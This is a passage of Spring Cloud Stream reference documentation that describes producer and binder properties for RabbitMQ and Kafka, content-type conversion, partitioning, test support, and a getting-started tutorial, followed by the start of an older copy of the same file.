available for output bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.producer.`.\n\npartitionKeyExpression::\n A SpEL expression that determines how to partition outbound data.\nIf set, or if `partitionKeyExtractorClass` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionKeyExtractorClass::\n A `PartitionKeyExtractorStrategy` implementation.\nIf set, or if `partitionKeyExpression` is set, outbound data on this channel will be partitioned, and `partitionCount` must be set to a value greater than 1 to be effective.\nThe two options are mutually exclusive.\nSee <<partitioning>>.\n+\nDefault: null.\npartitionSelectorClass::\n A `PartitionSelectorStrategy` implementation.\nMutually exclusive with `partitionSelectorExpression`.\nIf neither is set, the partition will be selected as 
the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: null.\npartitionSelectorExpression::\n A SpEL expression for customizing partition selection.\nMutually exclusive with `partitionSelectorClass`.\nIf neither is set, the partition will be selected as the `hashCode(key) % partitionCount`, where `key` is computed via either `partitionKeyExpression` or `partitionKeyExtractorClass`.\n+\nDefault: null.\npartitionCount::\n The number of target partitions for the data, if partitioning is enabled.\nMust be\n set to a value greater than 1 if the producer is partitioned.\nOn Kafka, interpreted as a\n hint; the larger of this and the partition count of the target topic is used instead.\n+\nDefault: `1`.\nrequiredGroups::\n A comma-separated list of groups to which the producer must ensure message delivery even if they start after it has been created (e.g., by pre-creating durable queues in RabbitMQ).\nheaderMode::\n When set to `raw`, disables header embedding on output.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when producing data for non-Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\n\n[[binder-specific-configuration]]\n== Binder-Specific Configuration\n\nThe following binder, consumer, and producer properties are specific to binder implementations.\n\n=== Rabbit-Specific Settings\n\n==== RabbitMQ Binder Properties\n\nBy default, the RabbitMQ binder uses Spring Boot's `ConnectionFactory`, and it therefore supports all Spring Boot configuration options for RabbitMQ.\n(For reference, consult the http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#common-application-properties[Spring Boot documentation].) 
RabbitMQ configuration options use the `spring.rabbitmq` prefix.\n\nIn addition to the Spring Boot options, the RabbitMQ binder supports the following properties:\n\nspring.cloud.stream.rabbit.binder.adminAddresses::\n A comma-separated list of RabbitMQ management plugin URLs.\nOnly used when `nodes` contains more than one entry.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.nodes::\n A comma-separated list of RabbitMQ node names.\nWhen more than one entry, used to locate the server address where a queue is located.\nEach entry in this list must have a corresponding entry in `spring.rabbitmq.addresses`.\n+\nDefault: empty.\nspring.cloud.stream.rabbit.binder.compressionLevel::\n Compression level for compressed bindings.\nSee `java.util.zip.Deflater`.\n+\nDefault: `1` (BEST_LEVEL).\n\n==== RabbitMQ Consumer Properties\n\nThe following properties are available for Rabbit consumers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.consumer.`.\n\nacknowledgeMode::\n The acknowledge mode.\n+\nDefault: `AUTO`.\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\ndurableSubscription::\n Whether subscription should be durable.\nOnly effective if `group` is also set.\n+\nDefault: `true`.\nmaxConcurrency::\n Default: `1`.\nprefetch::\n Prefetch count.\n+\nDefault: `1`.\nprefix::\n A prefix to be added to the name of the `destination` and queues.\n+\nDefault: \"\".\nrequeueRejected::\n Whether delivery failures should be requeued.\n+\nDefault: `true`.\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nrepublishToDlq::\n By default, messages which fail after retries are exhausted are rejected.\nIf a dead-letter queue (DLQ) is configured, RabbitMQ will route the failed message (unchanged) to the DLQ.\nIf set to `true`, the bus will republish failed messages to the DLQ with additional headers, including the exception message and stack trace from the cause of the final failure.\ntransacted::\n Whether to use transacted channels.\n+\nDefault: `false`.\ntxSize::\n The number of deliveries between acks.\n+\nDefault: `1`.\n\n==== Rabbit Producer Properties\n\nThe following properties are available for Rabbit producers only and\nmust be prefixed with `spring.cloud.stream.rabbit.bindings.<channelName>.producer.`.\n\nautoBindDlq::\n Whether to automatically declare the DLQ and bind it to the binder DLX.\n+\nDefault: `false`.\nbatchingEnabled::\n Whether to enable message batching by producers.\n+\nDefault: `false`.\nbatchSize::\n The number of messages to buffer when batching is enabled.\n+\nDefault: `100`.\nbatchBufferLimit::\n Default: `10000`.\nbatchTimeout::\n Default: `5000`.\ncompress::\n Whether data should be compressed when sent.\n+\nDefault: `false`.\ndeliveryMode::\n Delivery mode.\n+\nDefault: `PERSISTENT`.\nprefix::\n A prefix to be added to the name of the `destination` exchange.\n+\nDefault: \"\".\nrequestHeaderPatterns::\n The request headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\nreplyHeaderPatterns::\n The reply headers to be transported.\n+\nDefault: `[STANDARD_REQUEST_HEADERS,'*']`.\n\n=== Kafka-Specific Settings\n\n==== Kafka Binder Properties\n\nspring.cloud.stream.kafka.binder.brokers::\n A list of brokers 
to which the Kafka binder will connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultBrokerPort::\n `brokers` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the broker list.\n+\nDefault: `9092`.\nspring.cloud.stream.kafka.binder.zkNodes::\n A list of ZooKeeper nodes to which the Kafka binder can connect.\n+\nDefault: `localhost`.\nspring.cloud.stream.kafka.binder.defaultZkPort::\n `zkNodes` allows hosts specified with or without port information (e.g., `host1,host2:port2`).\nThis sets the default port when no port is configured in the node list.\n+\nDefault: `2181`.\nspring.cloud.stream.kafka.binder.headers::\n The list of custom headers that will be transported by the binder.\n+\nDefault: empty.\nspring.cloud.stream.kafka.binder.offsetUpdateTimeWindow::\n The frequency, in milliseconds, with which offsets are saved.\nIgnored if `0`.\n+\nDefault: `10000`.\nspring.cloud.stream.kafka.binder.offsetUpdateCount::\n The frequency, in number of updates, which which consumed offsets are persisted.\nIgnored if `0`.\nMutually exclusive with `offsetUpdateTimeWindow`.\n+\nDefault: `0`.\nspring.cloud.stream.kafka.binder.requiredAcks::\n The number of required acks on the broker.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.minPartitionCount::\n Effective only if `autoCreateTopics` or `autoAddPartitions` is set.\nThe global minimum number of partitions that the binder will configure on topics on which it produces\/consumes data.\nIt can be superseded by the `partitionCount` setting of the producer or by the value of `instanceCount` * `concurrency` settings of the producer (if either is larger).\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.replicationFactor::\n The replication factor of auto-created topics if `autoCreateTopics` is active.\n+\nDefault: `1`.\nspring.cloud.stream.kafka.binder.autoCreateTopics::\n If set to `true`, the binder will create new topics automatically.\nIf set to `false`, the binder will rely on the topics being already configured.\nIn the latter case, if the topics do not exist, the binder will fail to start.\nOf note, this setting is independent of the `auto.topic.create.enable` setting of the broker and it does not influence it: if the server is set to auto-create topics, they may be created as part of the metadata retrieval request, with default broker settings.\n+\nDefault: `true`.\nspring.cloud.stream.kafka.binder.autoAddPartitions::\n If set to `true`, the binder will create add new partitions if required.\nIf set to `false`, the binder will rely on the partition size of the topic being already configured.\nIf the partition count of the target topic is smaller than the expected value, the binder will fail to start.\n+\nDefault: `false`.\n\n\n==== Kafka Consumer Properties\n\nThe following properties are available for Kafka consumers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.consumer.`.\n\nautoCommitOffset::\n Whether to autocommit offsets when a message has been processed.\nIf set to `false`, an `Acknowledgment` header will be available in the message headers for late acknowledgment.\n+\nDefault: `true`.\nresetOffsets::\n Whether to reset offsets on the consumer to the value provided by `startOffset`.\n+\nDefault: `false`.\nstartOffset::\n The starting offset for new groups, or when `resetOffsets` is `true`.\nAllowed values: `earliest`, `latest`.\n+\nDefault: null (equivalent to 
`earliest`).\nenableDlq::\n When set to true, it will send enable DLQ behavior for the consumer.\n Messages that result in errors will be forwarded to a topic named `error.<destination>.<group>`.\n This provides an alternative option to the more common Kafka replay scenario for the case when the number of errors is relatively small and replaying the entire original topic may be too cumbersome.\n+\nDefault: `false`.\n\n==== Kafka Producer Properties\n\nThe following properties are available for Kafka producers only and\nmust be prefixed with `spring.cloud.stream.kafka.bindings.<channelName>.producer.`.\n\nbufferSize::\n Upper limit, in bytes, of how much data the Kafka producer will attempt to batch before sending.\n+\nDefault: `16384`.\nsync::\n Whether the producer is synchronous.\n+\nDefault: `false`.\nbatchTimeout::\n How long the producer will wait before sending in order to allow more messages to accumulate in the same batch.\n(Normally the producer does not wait at all, and simply sends all the messages that accumulated while the previous send was in progress.) A non-zero value may increase throughput at the expense of latency.\n+\nDefault: `0`.\n\n[[contenttypemanagement]]\n== Content Type and Transformation\n\nTo allow you to propagate information about the content type of produced messages, Spring Cloud Stream attaches, by default, a `contentType` header to outbound messages.\nFor middleware that does not directly support headers, Spring Cloud Stream provides its own mechanism of automatically wrapping outbound messages in an envelope of its own.\nFor middleware that does support headers, Spring Cloud Stream applications may receive messages with a given content type from non-Spring Cloud Stream applications.\n\nSpring Cloud Stream can handle messages based on this information in two ways:\n\n* Through its `contentType` settings on inbound and outbound channels\n* Through its argument mapping performed for methods annotated with `@StreamListener`\n\nSpring Cloud Stream allows you to declaratively configure type conversion for inputs and outputs using the `content-type` property of a binding.\nNote that general type conversion may also be accomplished easily by using a transformer inside your application.\nCurrently, Spring Cloud Stream natively supports the following type conversions commonly used in streams:\n\n* *JSON* to\/from *POJO*\n* *JSON* to\/from https:\/\/github.com\/spring-projects\/spring-tuple\/blob\/master\/spring-tuple\/src\/main\/java\/org\/springframework\/tuple\/Tuple.java[org.springframework.tuple.Tuple]\n* *Object* to\/from *byte[]* : Either the raw bytes serialized for remote transport, bytes emitted by an application, or converted to bytes using Java serialization(requires the object to be Serializable)\n* *String* to\/from *byte[]*\n* *Object* to *plain text* (invokes the object's _toString()_ method)\n\nWhere _JSON_ represents either a byte array or String payload containing JSON.\nCurrently, Objects may be converted from a JSON byte array or String.\nConverting to JSON always produces a String.\n\n[[mime-types]]\n=== MIME types\n`content-type` values are parsed as media types, e.g., `application\/json` or `text\/plain;charset=UTF-8`.\nMIME types are especially useful for indicating how to convert to String or byte[] content.\nSpring Cloud Stream also uses MIME type format to represent Java types, using the general type `application\/x-java-object` with a `type` parameter.\nFor example, `application\/x-java-object;type=java.util.Map` or 
`application\/x-java-object;type=com.bar.Foo` can be set as the `content-type` property of an input binding.\nIn addition, Spring Cloud Stream provides custom MIME types, notably, `application\/x-spring-tuple` to specify a Tuple.\n\n[[mime-types-and-java-types]]\n=== MIME types and Java types\n\nThe type conversions Spring Cloud Stream provides out of the box are summarized in the following table:\n\n|===\n|Source Payload |Target Payload |content-type header | content-type | Comments\n\n|POJO\n|JSON String\n|ignored\n|application\/json\n|\n\n|Tuple\n|JSON String\n|ignored\n|application\/json\n|JSON is tailored for Tuple\n\n|POJO\n|String (toString())\n|ignored\n|text\/plain, java.lang.String\n|\n\n|POJO\n|byte[] (java.io serialized)\n|ignored\n|application\/x-java-serialized-object\n|\n\n|JSON byte[] or String\n|POJO\n|application\/json (or none)\n|application\/x-java-object\n|\n\n|byte[] or String\n|Serializable\n|application\/x-java-serialized-object\n|application\/x-java-object\n|\n\n|JSON byte[] or String\n|Tuple\n|application\/json (or none)\n|application\/x-spring-tuple\n|\n\n|byte[]\n|String\n|any\n|text\/plain, java.lang.String\n|will apply any Charset specified in the content-type header\n\n|String\n|byte[]\n|any\n|application\/octet-stream\n|will apply any Charset specified in the content-type header\n\n|===\n\n[[NOTE]]\nConversion applies to payloads that require type conversion.\nFor example, if a module produces an XML string with outputType=application\/json, the payload will not be converted from XML to JSON.\nThis is because the payload at the module's output channel is already a String so no conversion will be applied at runtime.\n\n[[TIP]]\nWhile conversion is supported for both input and output channels, it is especially recommended to be used for the conversion of outbound messages.\nFor the conversion of inbound messages, especially when the target is a POJO, the `@StreamListener` support will perform the conversion automatically.\n\n=== ``@StreamListener` and Message Conversion\n\nThe `@StreamListener` annotation provides a convenient way for converting incoming messages without the need to specify the content type of an input channel.\nDuring the dispatching process to methods annotated with `@StreamListener`, a conversion will be applied automatically if the argument requires it.\n\nFor example, let's consider a message with the String content `{\"greeting\":\"Hello, world\"}` and a `content-type` header of `application\/json` is received on the input channel.\nLet us consider the following application that receives it:\n\n[source,java]\n----\npublic class GreetingMessage {\n\n String greeting;\n\n public String getGreeting() {\n return greeting;\n }\n\n public void setGreeting(String greeting) {\n this.greeting = greeting;\n }\n}\n\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class GreetingSink {\n\n\t\t@StreamListener(Sink.INPUT)\n\t\tpublic void receive(Greeting greeting) {\n\t\t\t\/\/ handle Greeting\n\t\t}\n\t}\n----\n\nThe argument of the method will be populated automatically with the POJO containing the unmarshalled form of the JSON String.\n\n== Inter-Application Communication\n\n=== Connecting Multiple Application Instances\n\nWhile Spring Cloud Stream makes it easy for individual Spring Boot applications to connect to messaging systems, the typical scenario for Spring Cloud Stream is the creation of multi-application pipelines, where microservice applications send data to each other.\nYou can achieve this scenario by correlating 
the input and output destinations of adjacent applications.\n\nSupposing that a design calls for the Time Source application to send data to the Log Sink application, you can use a common destination named `ticktock` for bindings within both applications.\n\nTime Source will set the following property:\n\n----\nspring.cloud.stream.bindings.output.destination=ticktock\n----\n\nLog Sink will set the following property:\n\n----\nspring.cloud.stream.bindings.input.destination=ticktock\n----\n\n=== Instance Index and Instance Count\n\nWhen scaling up Spring Cloud Stream applications, each instance can receive information about how many other instances of the same application exist and what its own instance index is.\nSpring Cloud Stream does this through the `spring.cloud.stream.instanceCount` and `spring.cloud.stream.instanceIndex` properties.\nFor example, if there are three instances of a HDFS sink application, all three instances will have `spring.cloud.stream.instanceCount` set to `3`, and the individual applications will have `spring.cloud.stream.instanceIndex` set to `0`, `1`, and `2`, respectively.\n\nWhen Spring Cloud Stream applications are deployed via Spring Cloud Data Flow, these properties are configured automatically; when Spring Cloud Stream applications are launched independently, these properties must be set correctly.\nBy default, `spring.cloud.stream.instanceCount` is `1`, and `spring.cloud.stream.instanceIndex` is `0`.\n\nIn a scaled-up scenario, correct configuration of these two properties is important for addressing partitioning behavior (see below) in general, and the two properties are always required by certain binders (e.g., the Kafka binder) in order to ensure that data are split correctly across multiple consumer instances.\n\n=== Partitioning\n\n==== Configuring Output Bindings for Partitioning\n\nAn output binding is configured to send partitioned data by setting one and only one of its `partitionKeyExpression` or `partitionKeyExtractorClass` properties, as well as its `partitionCount` property.\nFor example, the following is a valid and typical configuration:\n\n----\nspring.cloud.stream.bindings.output.producer.partitionKeyExpression=payload.id\nspring.cloud.stream.bindings.output.producer.partitionCount=5\n----\n\nBased on the above example configuration, data will be sent to the target partition using the following logic.\n\nA partition key's value is calculated for each message sent to a partitioned output channel based on the `partitionKeyExpression`.\nThe `partitionKeyExpression` is a SpEL expression which is evaluated against the outbound message for extracting the partitioning key.\n\n[TIP]\n====\nIf a SpEL expression is not sufficient for your needs, you can instead calculate the partition key value by setting the property `partitionKeyExtractorClass` to a class which implements the `org.springframework.cloud.stream.binder.PartitionKeyExtractorStrategy` interface.\nWhile the SpEL expression should usually suffice, more complex cases may use the custom implementation strategy.\n====\n\nOnce the message key is calculated, the partition selection process will determine the target partition as a value between `0` and `partitionCount - 1`.\nThe default calculation, applicable in most scenarios, is based on the formula `key.hashCode() % partitionCount`.\nThis can be customized on the binding, either by setting a SpEL expression to be evaluated against the key (via the `partitionSelectorExpression` property) or by setting a 
`org.springframework.cloud.stream.binder.PartitionSelectorStrategy` implementation (via the `partitionSelectorClass` property).\n\nAdditional properties can be configured for more advanced scenarios, as described in the following section.\n\n[NOTE]\n====\nThe Kafka binder will use the `partitionCount` setting as a hint to create a topic with the given partition count (in conjunction with the `minPartitionCount`, the maximum of the two being the value being used).\nExercise caution when configuring both `minPartitionCount` for a binder and `partitionCount` for an application, as the larger value will be used.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is disabled (the default), then the binder will fail to start.\nIf a topic already exists with a smaller partition count and `autoAddPartitions` is enabled, new partitions will be added.\nIf a topic already exists with a larger number of partitions than the maximum of (`minPartitionCount` and `partitionCount`), the existing partition count will be used.\n====\n\n===== Configuring Input Bindings for Partitioning\n\nAn input binding is configured to receive partitioned data by setting its `partitioned` property, as well as the `instanceIndex` and `instanceCount` properties on the application itself, as in the following example:\n\n----\nspring.cloud.stream.bindings.input.consumer.partitioned=true\nspring.cloud.stream.instanceIndex=3\nspring.cloud.stream.instanceCount=5\n----\n\nThe `instanceCount` value represents the total number of application instances between which the data need to be partitioned, and the `instanceIndex` must be a unique value across the multiple instances, between `0` and `instanceCount - 1`.\nThe instance index helps each application instance to identify the unique partition (or, in the case of Kafka, the partition set) from which it receives data.\nIt is important to set both values correctly in order to ensure that all of the data is consumed and that the application instances receive mutually exclusive datasets.\n\nWhile a scenario which using multiple instances for partitioned data processing may be complex to set up in a standalone case, Spring Cloud Dataflow can simplify the process significantly by populating both the input and output values correctly as well as relying on the runtime infrastructure to provide information about the instance index and instance count.\n\n== Testing\n\nSpring Cloud Stream provides support for testing your microservice applications without connecting to a messaging system.\nYou can do that by using the `TestSupportBinder`.\nThis is useful especially for unit testing your microservices.\n\nThe `TestSupportBinder` allows users to interact with the bound channels and inspect what messages are sent and received by the application\n\nFor outbound message channels, the `TestSupportBinder` registers a single subscriber and retains the messages emitted by the application in a `MessageCollector`.\nThey can be retrieved during tests and have assertions made against them.\n\nThe user can also send messages to inbound message channels, so that the consumer application can consume the messages.\nThe following example shows how to test both input and output channels on a processor.\n\n[source]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = ExampleTest.MyProcessor.class)\n@IntegrationTest({\"server.port=-1\"})\n@DirtiesContext\npublic class ExampleTest {\n\n @Autowired\n private Processor processor;\n\n @Autowired\n 
private BinderFactory<MessageChannel> binderFactory;\n\n @Autowired\n private MessageCollector messageCollector;\n\n @Test\n @SuppressWarnings(\"unchecked\")\n public void testWiring() {\n Message<String> message = new GenericMessage<>(\"hello\");\n processor.input().send(message);\n Message<String> received = (Message<String>) messageCollector.forChannel(processor.output()).poll();\n assertThat(received.getPayload(), equalTo(\"hello world\"));\n }\n\n\n @SpringBootApplication\n @EnableBinding(Processor.class)\n public static class MyProcessor {\n\n @Autowired\n private Processor channels;\n\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public String transform(String in) {\n return in + \" world\";\n }\n }\n}\n----\n\nIn the example above, we are creating an application that has an input and an output channel, bound through the `Processor` interface.\nThe bound interface is injected into the test so we can have access to both channels.\nWe are sending a message on the input channel and we are using the `MessageCollector` provided by Spring Cloud Stream's test support to capture the message has been sent to the output channel as a result.\nOnce we have received the message, we can validate that the component functions correctly.\n\n== Health Indicator\n\nSpring Cloud Stream provides a health indicator for binders.\nIt is registered under the name of `binders` and can be enabled or disabled by setting the `management.health.binders.enabled` property.\n\n== Samples\n\nFor Spring Cloud Stream samples, please refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-stream-samples[spring-cloud-stream-samples] repository on GitHub.\n\n== Getting Started\n\nTo get started with creating Spring Cloud Stream applications, visit the https:\/\/start.spring.io[Spring Initializr] and create a new Maven project named \"GreetingSource\".\nSelect Spring Boot version 1.3.4 SNAPSHOT and search or tick the checkbox for Stream Kafka (we will be using Kafka for messaging).\n\nNext, create a new class, `GreetingSource`, in the same package as the `GreetingSourceApplication` class.\nGive it the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.messaging.Source;\nimport org.springframework.integration.annotation.InboundChannelAdapter;\n\n@EnableBinding(Source.class)\npublic class GreetingSource {\n\n @InboundChannelAdapter(Source.OUTPUT)\n public String greet() {\n return \"hello world \" + System.currentTimeMillis();\n }\n}\n----\n\nThe `@EnableBinding` annotation is what triggers the creation of Spring Integration infrastructure components.\nSpecifically, it will create a Kafka connection factory, a Kafka outbound channel adapter, and the message channel defined inside the Source interface:\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\nThe auto-configuration also creates a default poller, so that the `greet()` method will be invoked once per second.\nThe standard Spring Integration `@InboundChannelAdapter` annotation sends a message to the source's output channel, using the return value as the payload of the message.\n\nTo test-drive this setup, run a Kafka message broker.\nAn easy way to do this is to use a Docker image:\n\n[source]\n----\n# On OS X\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=`docker-machine ip \\`docker-machine active\\`` --env 
ADVERTISED_PORT=9092 spotify\/kafka\n\n# On Linux\n$ docker run -p 2181:2181 -p 9092:9092 --env ADVERTISED_HOST=localhost --env ADVERTISED_PORT=9092 spotify\/kafka\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nThe consumer application is coded in a similar manner.\nGo back to Initializr and create another project, named LoggingSink.\nThen create a new class, `LoggingSink`, in the same package as the class `LoggingSinkApplication` and with the following code:\n\n[source,java]\n----\nimport org.springframework.cloud.stream.annotation.EnableBinding;\nimport org.springframework.cloud.stream.annotation.StreamListener;\nimport org.springframework.cloud.stream.messaging.Sink;\n\n@EnableBinding(Sink.class)\npublic class LoggingSink {\n\n @StreamListener(Sink.INPUT)\n public void log(String message) {\n System.out.println(message);\n }\n}\n----\n\nBuild the application:\n\n----\n.\/mvnw clean package\n----\n\nTo connect the GreetingSource application to the LoggingSink application, the two applications must use the same destination name.\nWhen you start up both applications, as shown below, you will see the consumer application printing \"hello world\" and a timestamp to the console:\n\n[source]\n----\ncd GreetingSource\njava -jar target\/GreetingSource-0.0.1-SNAPSHOT.jar --spring.cloud.stream.bindings.output.destination=mydest\n\ncd LoggingSink\njava -jar target\/LoggingSink-0.0.1-SNAPSHOT.jar --server.port=8090 --spring.cloud.stream.bindings.input.destination=mydest\n----\n\n(The different server port prevents collisions of the HTTP port used to service the Spring Boot Actuator endpoints in the two applications.)\n\nThe output of the LoggingSink application will look something like the following:\n\n[source]\n----\n[ main] s.b.c.e.t.TomcatEmbeddedServletContainer : Tomcat started on port(s): 8090 (http)\n[ main] com.example.LoggingSinkApplication : Started LoggingSinkApplication in 6.828 seconds (JVM running for 7.371)\nhello world 1458595076731\nhello world 1458595077732\nhello world 1458595078733\nhello world 1458595079734\nhello world 1458595080735\n----\n","old_contents":"[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n== Introducing Spring Cloud Stream\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications, and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following is a simple sink application which receives external messages.\n\n[source,java]\n----\n@SpringBootApplication\npublic class StreamApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(StreamApplication.class, args);\n }\n}\n\n@EnableBinding(Sink.class)\npublic class VoteSink {\n\n ...\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter 
is a single `Sink` interface).\nAn interface declares input and\/or output channels.\nSpring Cloud Stream provides the interfaces `Source`, `Sink`, and `Processor`; you can also define your own interfaces.\n\nThe following is the definition of the `Sink` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an _input channel_, through which received messages enter the application; the `@Output` annotation identifies an _output channel_, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter; if a name is not provided, the name of the annotated method will be used.\n\nSpring Cloud Stream will create an implementation of the interface for you.\nYou can use this in the application by autowiring it, as in the following example of a test case.\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = StreamApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* Spring Cloud Stream's application model\n* The Binder abstraction\n* Persistent publish-subscribe support\n* Consumer group support\n* Partitioning support\n* A pluggable Binder API\n\n\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output _channels_ injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::SCSt-with-binder.png[width=300,scaledwidth=\"50%\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in standalone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"fat\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle.\n\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-kafka[Kafka], https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-rabbit[Rabbit MQ], https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-redis[Redis], and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-gemfire[Gemfire].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it 
connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (e.g., the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<_introducing_spring_cloud_stream>> section, setting the application property `spring.cloud.stream.bindings.input.destination` to `raw-sensor-data` will cause it to read from the `raw-sensor-data` Kafka topic, or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can easily use different types of middleware with the same code: just include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder, and even whether to use different binders for different channels, at runtime.\n\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::SCSt-sensors.png[width=300,scaledwidth=\"50%\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS.\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer, and allows new applications to be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou can then add another application that interprets the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing this, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a _consumer group_.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.input.group` property to specify a group name.\nFor the consumers shown in the 
